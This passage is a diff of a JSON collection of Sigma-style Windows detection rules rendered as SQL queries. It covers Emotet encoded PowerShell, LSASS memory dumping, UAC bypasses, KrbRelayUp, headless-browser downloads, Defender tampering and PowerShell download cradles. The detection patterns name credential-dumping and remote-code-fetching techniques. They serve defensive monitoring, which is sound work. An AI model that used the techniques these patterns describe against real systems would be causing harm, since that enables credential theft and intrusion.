'%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE 
'%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "UAC Bypass Using NTFS Reparse Point - Process", - "id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Use NTFS Short Name in Image", - "id": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid Image based detection", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%~1.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~1.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~1.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~1.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~1.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~1.js%' ESCAPE '\\' OR NewProcessName LIKE '%~1.hta%' ESCAPE '\\' OR NewProcessName LIKE '%~2.exe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.bat%' ESCAPE '\\' OR NewProcessName LIKE '%~2.msi%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbe%' ESCAPE '\\' OR NewProcessName LIKE '%~2.vbs%' ESCAPE '\\' OR NewProcessName LIKE '%~2.dll%' ESCAPE '\\' OR NewProcessName LIKE '%~2.ps1%' ESCAPE '\\' OR NewProcessName LIKE '%~2.js%' ESCAPE '\\' OR NewProcessName LIKE '%~2.hta%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentProcessName LIKE '%-installer.exe' ESCAPE '\\') OR NewProcessName LIKE '%\\\\vcredi%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - 
"filename": "proc_creation_win_susp_ntfs_short_name_use_image.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Chopper Webshell Process Pattern", - "id": "fa3c117a-bc0d-416e-a31b-0c0e80653efb", - "status": "experimental", - "description": "Detects patterns found in process executions cause by China Chopper like tiny (ASPX) webshells", - "author": "Florian Roth (Nextron Systems), MSTI (query)", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.defense_evasion", + "attack.t1218.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\') AND (CommandLine LIKE '%&ipconfig&echo%' ESCAPE '\\' OR CommandLine LIKE '%&quser&echo%' ESCAPE '\\' OR CommandLine LIKE '%&whoami&echo%' ESCAPE '\\' OR CommandLine LIKE '%&c:&echo%' ESCAPE '\\' OR CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%&dir&echo%' ESCAPE '\\' OR CommandLine LIKE '%&echo [E]%' ESCAPE '\\' OR CommandLine LIKE '%&echo [S]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_webshell_chopper.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "XSL Script Processing", - "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", - "status": "test", - "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the 
processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", - "author": "Timur Zinniatullin, oscd.community", + "title": "Potential Suspicious Windows Feature Enabled - ProcCreation", + "id": "c740d4cf-a1e9-41de-bb16-8a46a4f57918", + "status": "experimental", + "description": "Detects usage of the built-in PowerShell cmdlet \"Enable-WindowsOptionalFeature\" used as a Deployment Image Servicing and Management tool.\nSimilar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.defense_evasion" ], "falsepositives": [ - "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", - "Msxsl.exe is not installed by default, so unlikely.", - "Static format arguments - https://petri.com/command-line-wmi-part-3" + "Legitimate usage of the features listed in the rule." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%/format%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%/Format:List%' ESCAPE '\\' OR CommandLine LIKE '%/Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%/Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%/Format:table%' ESCAPE '\\' OR CommandLine LIKE '%/Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%/Format:value%' ESCAPE '\\' OR CommandLine LIKE '%/Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%/Format:csv%' ESCAPE '\\'))) OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Enable-WindowsOptionalFeature%' ESCAPE '\\' AND CommandLine LIKE '%-Online%' ESCAPE '\\' AND CommandLine LIKE '%-FeatureName%' ESCAPE '\\' AND (CommandLine LIKE '%TelnetServer%' ESCAPE '\\' OR CommandLine LIKE '%Internet-Explorer-Optional-amd64%' ESCAPE '\\' OR CommandLine LIKE '%TFTP%' ESCAPE '\\' OR CommandLine LIKE '%SMB1Protocol%' ESCAPE '\\' OR CommandLine LIKE '%Client-ProjFS%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Subsystem-Linux%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_xsl_script_processing.yml" + "filename": "proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" }, { - "title": "Tor Client/Browser Execution", - "id": "62f7c9bf-9135-49b2-8aeb-1e54a6ecc13c", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", "status": "test", - "description": "Detects the use of Tor or Tor-Browser to connect to onion routing networks", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.execution", + 
"attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\tor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Tor Browser\\\\Browser\\\\firefox.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_tor_execution.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "NodejsTools PressAnyKey Lolbin", - "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "status": "test", - "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ - "Other tools with the same command line flag combination", - "Legitimate uses as part of Visual Studio development" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Microsoft.NodejsTools.PressAnyKey.exe normal %' ESCAPE '\\' OR (CommandLine LIKE '%.exe normal %' ESCAPE '\\' AND CommandLine LIKE '%.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\Microsoft\\\\NodeJsTools\\\\NodeJsTools%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE 
'%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Wlrmdr Lolbin Use as Launcher", - "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", - "status": "experimental", - "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", - "author": "frack113, manasmbellani", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "status": "test", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((NewProcessName LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentProcessName = '-')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_wlrmdr.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "ETW 
Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", + "title": "Potential Arbitrary File Download Via MSEdge.EXE", + "id": "94771a71-ba41-4b6e-a757-b531372eaab6", "status": "test", - "description": "Detects changes to environment variables related to ETW logging. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects usage of the \"msedge.exe\" binary as a LOLBIN to download arbitrary file via the CLI", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Software that uses MsEdge to download components in the background (see ParentImage, ParentCommandLine)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR OriginalFileName = 'msedge.exe') AND (CommandLine LIKE '%.exe http%' ESCAPE '\\' OR CommandLine LIKE '%msedge http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_browsers_msedge_arbitrary_download.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", - "id": "536e2947-3729-478c-9903-745aaffe60d2", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects attempts to remove windows defender configuration using the 
'MpPreference' cmdlet", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE 
'%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_invocation_specific.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "HackTool - Jlaive In-Memory Assembly Execution", - "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "title": "Registry Modification Via Regini.EXE", + "id": "5f60740a-f57b-4e76-82a1-15b6ff2cb134", "status": "experimental", - "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate modification of keys" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' AND 
CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND NOT (CommandLine REGEXP ':[^ \\\\]'))" ], - "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" + "filename": "proc_creation_win_regini_execution.yml" }, { - "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": 
"proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", - "status": "test", - "description": "Detects a set of suspicious network related commands often used in recon stages", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "status": "experimental", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" - ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Sometimes used by developers or system administrators for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_pua_process_hacker.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Unusually Long PowerShell CommandLine", + "id": "d0d28567-4b9a-45e2-8bbc-fb1b66a1f7f6", + "status": "test", + "description": "Detects unusually long PowerShell command lines with a length of 1000 characters or more", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + 